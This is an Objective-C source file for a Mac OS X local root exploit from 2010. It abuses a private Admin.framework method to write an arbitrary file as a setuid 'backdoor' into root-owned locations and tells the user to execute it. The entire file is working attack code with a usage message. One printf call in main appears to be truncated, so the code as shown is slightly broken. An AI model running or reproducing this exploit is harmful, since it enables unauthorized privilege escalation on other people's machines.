/* osx-irony-assist.m
*
* Copyright (c) 2010 by <mu-b@digit-labs.org>
*
* Apple MACOS X < 10.9/10? local root exploit
* by mu-b - June 2010
*
* - Tested on: Apple MACOS X <= 10.8.X
*
* $Id: osx-irony-assist.m 16 2015-04-10 09:34:47Z mu-b $
*
* The most ironic backdoor perhaps in the history of backdoors.
* Enabling 'Assistive Devices' in the 'Universal Access' preferences pane
* uses this technique to drop a file ("/var/db/.AccessibilityAPIEnabled")
* in a directory,
*
* drwxr-xr-x 62 root wheel 2108 9 Apr 16:23 db
*
* without being root, now how did you do that?
*
* Copy what you want, wherever you want it, with whatever permissions you
* desire, hmmm, backdoor?
*
* This is now fixed, so I guess this is OK :-)
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2010!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#import <SecurityFoundation/SFAuthorization.h>
#import <Foundation/Foundation.h>
/* where you want to write it! */
#define BACKDOOR_BIN "/var/db/.AccessibilityAPIEnabled"
int
do_assistive_copy(
const
char
*spath,
const
char
*dpath)
{
NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
id authenticatorInstance, *userUtilsInstance;
Class authenticatorClass, userUtilsClass;
(
void
) pool;
NSBundle *adminBundle =
[NSBundle bundleWithPath:
@"/System/Library/PrivateFrameworks/Admin.framework"
];
authenticatorClass = [adminBundle classNamed:
@"Authenticator"
];
if
(!authenticatorClass)
{
fprintf (stderr,
"* failed locating the Authenticator Class\n"
);
return
(EXIT_FAILURE);
}
printf (
"* Found Authenticator Class!\n"
);
authenticatorInstance =
[authenticatorClass performSelector:@selector(sharedAuthenticator)];
userUtilsClass = [adminBundle classNamed:
@"UserUtilities"
];
if
(!userUtilsClass)
{
fprintf (stderr,
"* failed locating the UserUtilities Class\n"
);
return
(EXIT_FAILURE);
}
printf (
"* found UserUtilities Class!\n"
);
userUtilsInstance = (id *) [userUtilsClass alloc];
SFAuthorization *authObj = [SFAuthorization authorization];
OSStatus isAuthed = (OSStatus)
[authenticatorInstance performSelector:@selector(authenticateUsingAuthorizationSync:)
withObject:authObj];
printf (
"* authenticateUsingAuthorizationSync:authObj returned: %i\n"
, isAuthed);
NSData *suidBin =
[NSData dataWithContentsOfFile:[NSString stringWithCString:spath
encoding:NSASCIIStringEncoding]];
if
(!suidBin)
{
fprintf (stderr,
"* could not create [NSDATA] suidBin!\n"
);
return
(EXIT_FAILURE);
}
NSDictionary *createFileWithContentsDict =
[NSDictionary dictionaryWithObject:(id)[NSNumber numberWithShort:2377]
forKey:(id)NSFilePosixPermissions];
if
(!createFileWithContentsDict)
{
fprintf (stderr,
"* could not create [NSDictionary] createFileWithContentsDict!\n"
);
return
(EXIT_FAILURE);
}
CFStringRef writePath =
CFStringCreateWithCString(NULL, dpath, kCFStringEncodingMacRoman);
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Wobjc-method-access"
[*userUtilsInstance createFileWithContents:suidBin path:writePath
attributes:createFileWithContentsDict];
#pragma clang diagnostic pop
printf (
"* now execute suid backdoor at %s\n"
, dpath);
/* send the "Distributed Object Message" to the defaultCenter,
* is this really necessary? (not for ownage)
*/
[[NSDistributedNotificationCenter defaultCenter]
postNotificationName:
@"com.apple.accessibility.api"
object
:
@"system.preferences"
userInfo:nil
deliverImmediately:YES];
return
(EXIT_SUCCESS);
}
int
main (
int
argc,
const
char
* argv[])
{
printf (
"Apple MACOS X < 10.9/10? local root exploit\n"
"by: <mu-b@digit-labs.org>\n"
if
(argc <= 1)
{
fprintf (stderr,
"Usage: %s <source> [destination]\n"
, argv[0]);
exit (EXIT_SUCCESS);
}
return
(do_assistive_copy(argv[1], argc >= 2 ? argv[2] : BACKDOOR_BIN));
}